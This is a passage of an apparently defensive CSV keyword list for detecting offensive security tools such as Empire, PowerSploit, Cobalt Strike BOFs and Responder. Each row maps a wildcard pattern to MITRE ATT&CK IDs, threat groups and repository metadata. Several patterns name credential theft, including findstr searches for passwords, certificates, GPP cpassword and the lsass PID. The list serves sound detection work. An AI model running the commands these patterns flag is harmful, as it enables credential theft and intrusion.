T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-LogonScriptCredentials -LogonScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Find-LogonScriptCredentials.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*FindModule *.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*FindObjects-BOF*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*FindProcessTokenAndDuplicate*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*FindProcHandle *lsass*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-PSServiceAccounts.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Findsploit*","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1493","334","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z" +"*findstr *BEGIN CERTIFICATE*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr *confidential*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr *cpassword *\sysvol\*.xml*","greyware_tool_keyword","findstr","linux commands abused by attackers - gpp finder","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr *net use*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr *password*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr *vnc.ini*","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr /si secret *.docx*","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*findstr.exe Tvndrgaaa*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Findsubdomains*","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*FindUncommonShares.p*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" +"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Find-UnsafeLogonScriptPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Find-UnsafeUNCPermissions -UNCScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Find-UnsafeUNCPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. 